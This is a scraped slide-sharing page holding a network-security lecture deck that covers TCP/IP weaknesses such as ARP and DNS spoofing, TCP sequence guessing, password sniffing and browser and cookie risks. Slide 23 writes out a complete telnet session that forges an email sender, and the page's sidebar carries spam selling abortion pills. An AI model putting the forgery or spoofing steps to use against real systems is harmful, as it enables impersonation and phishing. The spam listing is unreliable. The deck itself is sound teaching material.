Submit Search
Upload
security
âą
Download as PPT, PDF
âą
0 likes
âą
1,721 views
ahmad amiruddin
Follow
Technology
Education
Slideshow view
Report
Share
Slideshow view
Report
Share
1 of 42
Download now
Recommended
introduction to security
introduction to security
ahmad amiruddin
Â
Ports & sockets
Ports & sockets
myrajendra
Â
Well known protocols port numbers
Well known protocols port numbers
Varinder Singh Walia
Â
Meeting 7 : host configuration: dhcp
Meeting 7 : host configuration: dhcp
Syaiful Ahdan
Â
Chapter 01 - Overview
Chapter 01 - Overview
phanleson
Â
Meeting 12. pop, imap.ppt
Meeting 12. pop, imap.ppt
Syaiful Ahdan
Â
Introduction to TCP/IP
Introduction to TCP/IP
Frank Fang Kuo Yu
Â
Meeting 6 : ftp
Meeting 6 : ftp
Syaiful Ahdan
Â
Recommended
introduction to security
introduction to security
ahmad amiruddin
Â
Ports & sockets
Ports & sockets
myrajendra
Â
Well known protocols port numbers
Well known protocols port numbers
Varinder Singh Walia
Â
Meeting 7 : host configuration: dhcp
Meeting 7 : host configuration: dhcp
Syaiful Ahdan
Â
Chapter 01 - Overview
Chapter 01 - Overview
phanleson
Â
Meeting 12. pop, imap.ppt
Meeting 12. pop, imap.ppt
Syaiful Ahdan
Â
Introduction to TCP/IP
Introduction to TCP/IP
Frank Fang Kuo Yu
Â
Meeting 6 : ftp
Meeting 6 : ftp
Syaiful Ahdan
Â
Telnet presentation
Telnet presentation
travel_affair
Â
Sockets in unix
Sockets in unix
swtjerin4u
Â
TCP IP
TCP IP
hivasu
Â
Final networks lab manual
Final networks lab manual
Jaya Prasanna
Â
20 common port numbers and their purposes
20 common port numbers and their purposes
salamassh
Â
security problems in the tcp/ip protocol suite
security problems in the tcp/ip protocol suite
Yash Kotak
Â
Meeting 5.1 : telnet
Meeting 5.1 : telnet
Syaiful Ahdan
Â
TCP - Transmission Control Protocol
TCP - Transmission Control Protocol
Peter R. Egli
Â
Firewalls
Firewalls
hemantag
Â
Computer Network - Telnet and Gopher
Computer Network - Telnet and Gopher
Manoj Kumar
Â
Chap 19 ftp & tftp
Chap 19 ftp & tftp
Noctorous Jamal
Â
Ports and protocols
Ports and protocols
Kailash Kumar
Â
Np unit iii
Np unit iii
vamsitricks
Â
Ch02 TCP/IP Concepts Review
Ch02 TCP/IP Concepts Review
phanleson
Â
Tlc 004 - take a sip of sip
Tlc 004 - take a sip of sip
Anna Volynkina
Â
Transport Layer Port or TCP/IP & UDP Port
Transport Layer Port or TCP/IP & UDP Port
Netwax Lab
Â
Np unit2
Np unit2
vamsitricks
Â
Features of tcp (part 2) .68
Features of tcp (part 2) .68
myrajendra
Â
TCP/IP(networking)
TCP/IP(networking)
welcometofacebook
Â
Np unit iv ii
Np unit iv ii
vamsitricks
Â
Firewall
Firewall
Manikyala Rao
Â
Application Layer and Socket Programming
Application Layer and Socket Programming
elliando dias
Â
More Related Content
What's hot
Telnet presentation
Telnet presentation
travel_affair
Â
Sockets in unix
Sockets in unix
swtjerin4u
Â
TCP IP
TCP IP
hivasu
Â
Final networks lab manual
Final networks lab manual
Jaya Prasanna
Â
20 common port numbers and their purposes
20 common port numbers and their purposes
salamassh
Â
security problems in the tcp/ip protocol suite
security problems in the tcp/ip protocol suite
Yash Kotak
Â
Meeting 5.1 : telnet
Meeting 5.1 : telnet
Syaiful Ahdan
Â
TCP - Transmission Control Protocol
TCP - Transmission Control Protocol
Peter R. Egli
Â
Firewalls
Firewalls
hemantag
Â
Computer Network - Telnet and Gopher
Computer Network - Telnet and Gopher
Manoj Kumar
Â
Chap 19 ftp & tftp
Chap 19 ftp & tftp
Noctorous Jamal
Â
Ports and protocols
Ports and protocols
Kailash Kumar
Â
Np unit iii
Np unit iii
vamsitricks
Â
Ch02 TCP/IP Concepts Review
Ch02 TCP/IP Concepts Review
phanleson
Â
Tlc 004 - take a sip of sip
Tlc 004 - take a sip of sip
Anna Volynkina
Â
Transport Layer Port or TCP/IP & UDP Port
Transport Layer Port or TCP/IP & UDP Port
Netwax Lab
Â
Np unit2
Np unit2
vamsitricks
Â
Features of tcp (part 2) .68
Features of tcp (part 2) .68
myrajendra
Â
TCP/IP(networking)
TCP/IP(networking)
welcometofacebook
Â
Np unit iv ii
Np unit iv ii
vamsitricks
Â
What's hot
(20)
Telnet presentation
Telnet presentation
Â
Sockets in unix
Sockets in unix
Â
TCP IP
TCP IP
Â
Final networks lab manual
Final networks lab manual
Â
20 common port numbers and their purposes
20 common port numbers and their purposes
Â
security problems in the tcp/ip protocol suite
security problems in the tcp/ip protocol suite
Â
Meeting 5.1 : telnet
Meeting 5.1 : telnet
Â
TCP - Transmission Control Protocol
TCP - Transmission Control Protocol
Â
Firewalls
Firewalls
Â
Computer Network - Telnet and Gopher
Computer Network - Telnet and Gopher
Â
Chap 19 ftp & tftp
Chap 19 ftp & tftp
Â
Ports and protocols
Ports and protocols
Â
Np unit iii
Np unit iii
Â
Ch02 TCP/IP Concepts Review
Ch02 TCP/IP Concepts Review
Â
Tlc 004 - take a sip of sip
Tlc 004 - take a sip of sip
Â
Transport Layer Port or TCP/IP & UDP Port
Transport Layer Port or TCP/IP & UDP Port
Â
Np unit2
Np unit2
Â
Features of tcp (part 2) .68
Features of tcp (part 2) .68
Â
TCP/IP(networking)
TCP/IP(networking)
Â
Np unit iv ii
Np unit iv ii
Â
Similar to security
Firewall
Firewall
Manikyala Rao
Â
Application Layer and Socket Programming
Application Layer and Socket Programming
elliando dias
Â
Training Day Slides
Training Day Slides
adam_merritt
Â
16.) layer 3 (basic tcp ip routing)
16.) layer 3 (basic tcp ip routing)
Jeff Green
Â
More on Tcp/Ip
More on Tcp/Ip
Rakhi Saxena
Â
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
masoodnt10
Â
TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin
TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin
EC-Council
Â
Unit 8 Java
Unit 8 Java
arnold 7490
Â
Session 2 Tp 2
Session 2 Tp 2
githe26200
Â
socket programming
socket programming
prashantzagade
Â
socket programming
socket programming
prashantzagade
Â
TCP/IP Basics
TCP/IP Basics
SMC Networks Europe
Â
Zdalna komunikacja sieciowa - zagadnienia sieciowe
Zdalna komunikacja sieciowa - zagadnienia sieciowe
Agnieszka Kuba
Â
CCNA RS_NB - Chapter 5
CCNA RS_NB - Chapter 5
Irsandi Hasan
Â
Tcp
Tcp
giaolvq
Â
Internet protocol (ip) ppt
Internet protocol (ip) ppt
Dulith Kasun
Â
class12_Networking2
class12_Networking2
T. J. Saotome
Â
IP Utilites
IP Utilites
hariprasadnr
Â
Socket Programming TCP:IP PPT.pdf
Socket Programming TCP:IP PPT.pdf
PraveenKumar187040
Â
14 network tools
14 network tools
Shay Cohen
Â
Similar to security
(20)
Firewall
Firewall
Â
Application Layer and Socket Programming
Application Layer and Socket Programming
Â
Training Day Slides
Training Day Slides
Â
16.) layer 3 (basic tcp ip routing)
16.) layer 3 (basic tcp ip routing)
Â
More on Tcp/Ip
More on Tcp/Ip
Â
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
Â
TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin
TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin
Â
Unit 8 Java
Unit 8 Java
Â
Session 2 Tp 2
Session 2 Tp 2
Â
socket programming
socket programming
Â
socket programming
socket programming
Â
TCP/IP Basics
TCP/IP Basics
Â
Zdalna komunikacja sieciowa - zagadnienia sieciowe
Zdalna komunikacja sieciowa - zagadnienia sieciowe
Â
CCNA RS_NB - Chapter 5
CCNA RS_NB - Chapter 5
Â
Tcp
Tcp
Â
Internet protocol (ip) ppt
Internet protocol (ip) ppt
Â
class12_Networking2
class12_Networking2
Â
IP Utilites
IP Utilites
Â
Socket Programming TCP:IP PPT.pdf
Socket Programming TCP:IP PPT.pdf
Â
14 network tools
14 network tools
Â
More from ahmad amiruddin
firewall
firewall
ahmad amiruddin
Â
enkripsi and authentication
enkripsi and authentication
ahmad amiruddin
Â
application layer
application layer
ahmad amiruddin
Â
transport layer protocol
transport layer protocol
ahmad amiruddin
Â
protokol routing
protokol routing
ahmad amiruddin
Â
routing
routing
ahmad amiruddin
Â
penerapan ip address subnet
penerapan ip address subnet
ahmad amiruddin
Â
manajemen ip
manajemen ip
ahmad amiruddin
Â
ip address and subnet address
ip address and subnet address
ahmad amiruddin
Â
internet layer protokol
internet layer protokol
ahmad amiruddin
Â
data link layer
data link layer
ahmad amiruddin
Â
referensi osi
referensi osi
ahmad amiruddin
Â
konsep dasar jaringan komputer
konsep dasar jaringan komputer
ahmad amiruddin
Â
membuat desain sistem keamanan jaringan
membuat desain sistem keamanan jaringan
ahmad amiruddin
Â
mengadministrasi server dalam jaringan
mengadministrasi server dalam jaringan
ahmad amiruddin
Â
More from ahmad amiruddin
(15)
firewall
firewall
Â
enkripsi and authentication
enkripsi and authentication
Â
application layer
application layer
Â
transport layer protocol
transport layer protocol
Â
protokol routing
protokol routing
Â
routing
routing
Â
penerapan ip address subnet
penerapan ip address subnet
Â
manajemen ip
manajemen ip
Â
ip address and subnet address
ip address and subnet address
Â
internet layer protokol
internet layer protokol
Â
data link layer
data link layer
Â
referensi osi
referensi osi
Â
konsep dasar jaringan komputer
konsep dasar jaringan komputer
Â
membuat desain sistem keamanan jaringan
membuat desain sistem keamanan jaringan
Â
mengadministrasi server dalam jaringan
mengadministrasi server dalam jaringan
Â
Recently uploaded
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
Â
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(âïž+971_581248768%)**%*]'#abortion pills for sale in dubai@
Â
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
MadyBayot
Â
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
The Digital Insurer
Â
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
Khem
Â
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Remote DBA Services
Â
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
rafiqahmad00786416
Â
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Juan lago vĂĄzquez
Â
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
DianaGray10
Â
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
Â
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
Â
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
wesley chun
Â
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
Nanddeep Nachan
Â
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
Zilliz
Â
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
Â
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
Khushali Kathiriya
Â
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
MIND CTI
Â
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel AraĂșjo
Â
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
apidays
Â
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
debabhi2
Â
Recently uploaded
(20)
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Â
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
Â
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
Â
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
Â
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
Â
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Â
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
Â
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Â
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Â
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Â
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Â
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
Â
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
Â
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
Â
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
Â
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
Â
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
Â
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Â
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Â
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
Â
security
1.
Pertemuan - 12 Introduction
to Security Jaringan Komputer Teknik Informatika Universitas Yudharta Pasuruan 2012 © Levente Buttyån MOCHAMAD SIRODJUDIN, S.Kom, MM www.sirodjudin.com
2.
Outline ï§ TCP/IP networking
overview ï§ protocols and known vulnerabilities â â â â â â ARP / ARP spoofing IP / eavesdropping, alteration, traffic analysis, etc. TCP / SYN attack Telnet, FTP / password sniffing SMTP / e-mail forgery, eavesdropping, alteration DNS / DNS spoofing ï§ more known security problems â â â â Web forms, cookies, and CGI scripts mobile code (Java scripts, Java applets, and ActiveX controls) denial of service (DoS) exploiting bugs in software (buffer overflow problems) ï§ outline of the course © Levente ButtyĂĄn 2
3.
TCP/IP layering HTTP application ⊠FTP DNS SMTP ⊠SNMP transport UDP TCP/IP networking
overview TCP network IGMP ICMP IP ARP hardware interface media © Levente Buttyån link RARP 3
4.
An example end system end
system HTTP client HTTP server HTTP TCP TCP TCP TCP/IP networking overview router IP Ethernet driver IP Ethernet protocol Ethernet © Levente Buttyån IP IP Ethernet driver token ring driver token ring protocol IP token ring driver token ring 4
5.
Encapsulation user data HTTP client HTTP hdr TCP TCP
hdr TCP/IP networking overview IP IP hdr Ethernet driver Eth. hdr tr. Ethernet © Levente Buttyån 5
6.
Demultiplexing HTTP FTP ⊠DNS SNMP SMTP TCP TCP/IP networking overview ⊠UDP IGMP ICMP IP demuxing
based on the port number in the TCP or UDP header demuxing based on the protocol id in the IP header RARP ARP Ethernet driver © Levente Buttyån demuxing based on frame type in the Ethernet header 6
7.
Names and addresses ï§
IP addresses TCP/IP networking overview â every interface has a unique IP address â 32 bits long, usually given in dotted decimal notation â 5 classes: âą âą âą âą âą class A: â0â + 7 bits net ID + 24 bits host ID class B: â10â + 14 bits net ID + 16 bits host ID class C: â110â + 21 bits net ID + 8 bits host ID class D: â1110â + 28 bits multicast group ID class E: starts with â11110â, reserved for future use â subnet addressing (CIDR - classless Internet domain routing) âą host ID portion is divided into a subnet ID and a host ID âą e.g., class B address: â10â + 14 bit net ID + 8 bit subnet ID + 8 bit host ID ï hierarchical addressing © Levente ButtyĂĄn 7
8.
Names and addresses ï§
hardware address (MAC addresses) TCP/IP networking overview â â â â every interface has a unique and fixed hardware address too it is used by the data link layer in case of Ethernet, it is 48 bits long mapping between IP addresses and MAC addresses are done by ARP ï§ host names â human readable, hierarchical names, such as www.hit.bme.hu â every host may have several names â mapping between names and IP addresses is done by the Domain Name System (DNS) © Levente ButtyĂĄn 8
9.
ARP â Address
Resolution Protocol ï§ mapping from IP addresses to MAC addresses Request .1 08:00:20:03:F6:42 .2 .3 .4 00:00:C0:C2:9B:26 .5 140.252.13 Protocols and vulnerabilities arp req | target IP: 140.252.13.5 | target eth: ? Reply .1 08:00:20:03:F6:42 .2 .3 .4 00:00:C0:C2:9B:26 .5 140.252.13 arp rep | sender IP: 140.252.13.5 | sender eth: 00:00:C0:C2:9B:26 © Levente ButtyĂĄn 9
10.
ARP spoofing ï§ an
ARP request can be responded by another host Request .1 08:00:20:03:F6:42 .2 .3 .4 00:00:C0:C2:9B:26 .5 140.252.13 Protocols and vulnerabilities arp req | target IP: 140.252.13.5 | target eth: ? Reply .1 08:00:20:03:F6:42 .2 .3 00:34:CD:C2:9F:A0 00:00:C0:C2:9B:26 .4 .5 140.252.13 arp rep | sender IP: 140.252.13.5 | sender eth: 00:34:CD:C2:9F:A0 © Levente Buttyån 10
11.
Protocols and vulnerabilities IP
â Internet Protocol ï§ provides an unreliable, connectionless datagram delivery service to the upper layers ï§ its main function is routing ï§ it is implemented in both end systems and intermediate systems (routers) ï§ routers maintain routing tables that define the next hop router towards a given destination (host or network) ï§ IP routing uses the routing table and the information in the IP header (e.g., the destination IP address) to route a packet © Levente ButtyĂĄn 11
12.
IP security problems ï§
user data in IP packets is not protected in any way â anyone who has access to a router can read and modify the user data in the packets ï§ IP packets are not authenticated â it is fairly easy to generate an IP packet with an arbitrary source IP address Protocols and vulnerabilities ï§ traffic analysis â even if user data was encrypted, one could easily determine who is communicating with whom by just observing the addressing information in the IP headers ï§ information exchanged between routers to maintain their routing tables is not authenticated â â â â correct routing table updates can be modified or fake ones can be disseminated this may screw up routing completely leading to loops or partitions it may also facilitate eavesdropping, modification, and monitoring of traffic it may cause congestion of links or routers (i.e., denial of service) © Levente ButtyĂĄn 12
13.
TCP â Transmission
Control Protocol ï§ provides a connection oriented, reliable, byte stream service to the upper layers ï§ connection oriented: Protocols and vulnerabilities â connection establishment phase prior to data transfer â state information (sequence numbers, window size, etc.) is maintained at both ends ï§ reliable: â positive acknowledgement scheme (unacknowledged bytes are retransmitted after a timeout) â checksum on both header and data â reordering of segments that are out of order â detection of duplicate segments â flow control (sliding window mechanism) © Levente ButtyĂĄn 13
14.
TCP connection establishment 3
way handshake client SYN = ISNC SYN = ISNS, ACK(ISNC) server ISN â Initial Sequence Number ACK(ISNS) Protocols and vulnerabilities data transfer â sequence numbers are 32 bits long â the sequence number in a data segment identifies the first byte in the segment â sequence numbers are initialized with a ârandomâ value during connection setup â the RFC suggests that the ISN is incremented by one at least every 4 ms © Levente ButtyĂĄn 14
15.
TCP SYN attack ï§
in Berkeley implementations, the ISN is incremented by a constant amount (64000) â once per 0.5 second, and â each time a connection is initiated Protocols and vulnerabilities ï§ it is not hopeless to guess the next ISN to be used by a server ï§ an attacker can impersonate a trusted host (e.g., in case of r commands, authentication is based on source IP address solely) attacker SYN = ISNX, SRC_IP = T server trusted host (T) SYN = ISNS, ACK(ISNX) ACK(ISNS), SRC_IP = T SRC_IP = T, nasty_data © Levente ButtyĂĄn 15
16.
TCP SYN attack
â How to guess ISNS? attacker server Protocols and vulnerabilities Dt â â â â â â ISNSâ depends on ISNS and Dt Dt can be estimated from the round trip time assume Dt can be estimated with 10 ms precision the attacker has an uncertainty of 1280 in the possible value for ISNSâ assume each trial takes 5 s the attacker has a reasonable likelihood of succeeding in 6400 s and a near-certainty within one day © Levente ButtyĂĄn 16
17.
FTP â File
Transfer Protocol client user interface user server Protocols and vulnerabilities protocol interpreter data transfer function file system © Levente Buttyån control connection (FTP commands and replies) protocol interpreter data connection data transfer function file system 17
18.
FTP contâd ï§ typical
FTP commands: â â â â â RETR filename â retrieve (get) a file from the server STOR filename â store (put) a file on the server TYPE type â specify file type (e.g., A for ASCII) USER username â username on server PASS password â password on server ï§ FTP is a text (ASCII) based protocol server Protocols and vulnerabilities client % ftp ftp.epfl.ch <TCP connection setup to port 21 of ftp.epfl.ch> â220 ftp.epfl.ch FTP server (version 5.60) ready.â Connected to ftp.epfl.ch. Name: buttyan âUSER buttyanâ â331 Password required for user buttyan.â Password: kiskacsa âPASS kiskacsaâ â230 User buttyan logged in.â ⊠© Levente ButtyĂĄn 18
19.
Telnet Protocols and vulnerabilities ï§
provides remote login service to users ï§ works between hosts that use different operating systems ï§ uses option negotiation between client and server to determine what features are supported by both ends Telnet client kernel Telnet server login shell kernel terminal driver TCP/IP TCP/IP pseudoterminal driver TCP connection user © Levente ButtyĂĄn 19
20.
Telnet contâd ï§ Telnet
session example (âcharacter at a timeâ mode) server client % telnet ahost.epfl.ch Connected to ahost.epfl.ch. Escape character is â^]â. <TCP connection setup to port 23 of ahost.epfl.ch> <Telnet option negotiation> âUNIX(r) System V Release 4.0â âLogin:â Protocols and vulnerabilities Login: b âbâ Login: bu âuâ ⊠Login: buttyan ânâ âPassword:â Password: k âkâ ⊠Password: kiskacsa âaâ <OS greetings and shell prompt, e.g., â%â> © Levente ButtyĂĄn ⊠20
21.
SMTP â Simple
Mail Transfer Protocol sending host user agent mails to be sent user local MTA SMTP relay MTA TCP connection SMTP Protocols and vulnerabilities TCP port 25 relay MTA SMTP receiving host local MTA user agent user © Levente Buttyån SMTP relay MTA user mailbox 21
22.
SMTP contâd ï§ SMTP
is used by MTAs to talk to each other ï§ SMTP is a text (ASCII) based protocol sending MTA (rivest.hit.bme.hu) receiving MTA (shamir.hit.bme.hu) <TCP connection establishment to port 25> âHELO rivest.hit.bme.hu.â â250 shamir.hit.bme.hu Hello rivest.hit.bme.hu., pleased to meet youâ Protocols and vulnerabilities âMAIL from: buttyan@rivest.hit.bme.huâ â250 buttyan@rivest.hit.bme.hu... Sender okâ âRCPT to: hubaux@lca.epfl.châ â250 hubaux@lca.epfl.ch⊠Recipient okâ âDATAâ â354 Enter mail, end with a â.â on a line by itselfâ <message to be sent> . â250 Mail acceptedâ âQUITâ â221 shamir.hit.bme.hu delivering mailâ © Levente ButtyĂĄn 22
23.
SMTP security problems ï§
SMTP does not provide any protection of e-mail messages â messages can be read and modified by any of the MTAs involved â fake messages can easily be generated (e-mail forgery) Protocols and vulnerabilities ï§ Example: % telnet frogstar.hit.bme.hu 25 Trying... Connected to frogstar.hit.bme.hu. Escape character is â^[â. 220 frogstar.hit.bme.hu ESMTP Sendmail 8.11.6/8.11.6; Mon, 10 Feb 2003 14:23:21 +0100 helo abcd.bme.hu 250 frogstar.hit.bme.hu Hello [152.66.249.32], pleased to meet you mail from: bill.gates@microsoft.com 250 2.1.0 bill.gates@microsoft.com... Sender ok rcpt to: buttyan@ebizlab.hit.bme.hu 250 2.1.5 buttyan@ebizlab.hit.bme.hu... Recipient ok data 354 Enter mail, end with "." on a line by itself Your fake message goes here. . 250 2.0.0 h1ADO5e21330 Message accepted for delivery quit 221 frogstar.hit.bme.hu closing connection Connection closed by foreign host. % © Levente ButtyĂĄn 23
24.
Protocols and vulnerabilities Be
careful, though! Return-Path: <bill.gates@microsoft.com> Received: from frogstar.hit.bme.hu (root@frogstar.hit.bme.hu [152.66.248.44]) by shamir.ebizlab.hit.bme.hu (8.12.7/8.12.7/Debian-2) with ESMTP id h1ADSsxG022719 for <buttyan@ebizlab.hit.bme.hu>; Mon, 10 Feb 2003 14:28:54 +0100 Received: from abcd.bme.hu ([152.66.249.32]) by frogstar.hit.bme.hu (8.11.6/8.11.6) with SMTP id h1ADO5e21330 for buttyan@ebizlab.hit.bme.hu; Mon, 10 Feb 2003 14:25:41 +0100 Date: Mon, 10 Feb 2003 14:25:41 +0100 From: bill.gates@microsoft.com Message-Id: <200302101325.h1ADO5e21330@frogstar.hit.bme.hu> To: undisclosed-recipients:; X-Virus-Scanned: by amavis-dc Status: Your fake message goes here. © Levente Buttyån 24
25.
DNS â Domain
Name System Protocols and vulnerabilities ï§ The DNS is a distributed database that provides mapping between hostnames and IP addresses ï§ the DNS name space is hierarchical â top level domains: com, edu, gov, int, mil, net, org, ae, âŠ, hu, ⊠zw â top level domains may contain second level domains e.g., bme within hu, epfl within ch, ⊠â second level domains may contain third level domains, etc. ï§ each domain has name servers â usually (not always) a name server knows the IP address of the top level name servers â if a domain contains sub-domains, then the name server knows the IP address of the sub-domain name servers â when a new host is added to a domain, the administrator adds the (hostname, IP address) mapping to the database of the local name server © Levente ButtyĂĄn 25
26.
DNS contâd frogstar.hit.bme.hu =
? application 152.66.248.44 local name srv frogstar.hit.bme.hu = ? IP of ns in hu top level name srv name srv in hu Protocols and vulnerabilities name srv in bme.hu name srv in hit.bme.hu â a single DNS reply may include several (hostname, IP address) mappings (Resource Records) â received information is cached by the name server © Levente ButtyĂĄn 26
27.
DNS spoofing ï§ the
cache of a DNS name server is poisoned with false information ï§ how to do it? Protocols and vulnerabilities â assume that the attacker wants www.anything.hu to map to his own IP address 152.66.249.32 â approach 1: âą attacker submits a DNS query âwww.anything.hu=?â to ns.victim.hu âą a bit later it forges a DNS reply âwww.anything.hu=152.66.249.32â âą UDP makes forging easier but the attacker must still predict the query ID â approach 2 (attacker has access to ns.attacker.hu): âą the attacker modifies its local name server such that it responds a query âwww.attacker.hu=?â with âwww.anything.hu=152.66.249.32â âą the attacker then submits a query âwww.attacker.hu=?â to ns.victim.hu âą ns.victim.hu sends the query âwww.attacker.hu=?â to ns.attacker.hu âą ns.attacker.hu responds with âwww.anything.hu=152.66.249.32â © Levente ButtyĂĄn 27
28.
Web security â
Browser side risks ï§ obtaining a valid browser â IE usually comes with the OS â Netscape can be obtained from web sites â How can you be sure that you are downloading a genuine copy? (remember DNS spoofing) â a fake browser can look like a genuine one, but it can Web security problems âą obtain and send passwords typed in by the user âą downgrade browser security (e.g., reduce key length used in SSL) âą âŠ ï§ web forms â used to send data from the user to the server (e.g., online applications, queries to a database, etc.) â if pure HTTP is used, then the data is sent in clear â sensitive information can be eavesdropped and/or modified © Levente ButtyĂĄn 28
29.
Browser side risks
contâd ï§ helper applications â the browser cannot handle all kind of downloaded data â it invokes an external program (the helper) on the userâs machine with the downloaded data as parameter â e.g., to display a PostScript file, it may pass it to GhostView â downloaded content can be dangerous (e.g., MS Word and Excel files may contain macro viruses) Web security problems ï§ mobile code â Java applets âą normally run within a controlled environment (sandbox) âą access to local resources is strictly controlled by a security manager âą however, an applet may escape from the sandbox due to some bugs in the implementation of the Java Virtual Machine âą several such bugs have been discovered, reported, and fixed âą what guarantees that thereâs no more? © Levente ButtyĂĄn 29
30.
Browser side risks
contâd ï§ mobile code (contâd) â ActiveX controls âą a Microsoft approach to mobile code âą ActiveX controls are executables that run directly on the machine (thereâs no sandbox) âą ActiveX controls can be signed and declared safe by their creators âą but an ActiveX control declared safe may turn out to be dangerous Web security problems â Compaq signed a control safe which allowed for remote management of servers â Microsoft signed a control which could write arbitrary file on the hard disk (it was exploited by a virus Kak.Worm) â JavaScript != Java applet âą scripts are interpreted by the browser itself âą not as powerful as Java (e.g., many attacks require that the user clicks on a button to activate the malicious code) âą successful attacks reported include history tracking, stealing files, helping Java applets to bypass firewalls, etc. © Levente ButtyĂĄn 30
31.
Browser side risks
contâd ï§ cookies Web security problems â a cookie is a (name, value) pair â cookies are set by web servers and stored by web browsers â a cookie set by a server is sent back to the server when the browser visits the server again â used to create âHTTP sessionsâ (session state information is stored in cookies) â example: client server get index.html content of index.html + set-cookie: sessionID=123456789 get nextlink.html + cookie: sessionID=123456789 ⊠© Levente ButtyĂĄn 31
32.
Browser side risks
contâd ï§ cookies (contâd) â if cookies are sent in clear, then they can be eavesdropped and used to hijack an âHTTP sessionâ â cookies can be used to track what sites the user visits (can lead to serious privacy violation!) Web security problems âą many sites use third party advertisements âą the third party can set a cookie that identifies the user âą this cookie is sent to the third party each time an ad is downloaded by the userâs browser along with the address of the page that contains the link to the ad (the âreferrerâ field of the HTTP header contains this address) whatever.com index.html browser get ad_server.asp + referrer=âwhatever.com/index.htmlâ + cookie: user=123456789 © Levente ButtyĂĄn <html> ⊠<img src=âhttp://thirdparty.com/ad_server.aspâ> ⊠</html> thirdparty.com 32
33.
Browser side risks
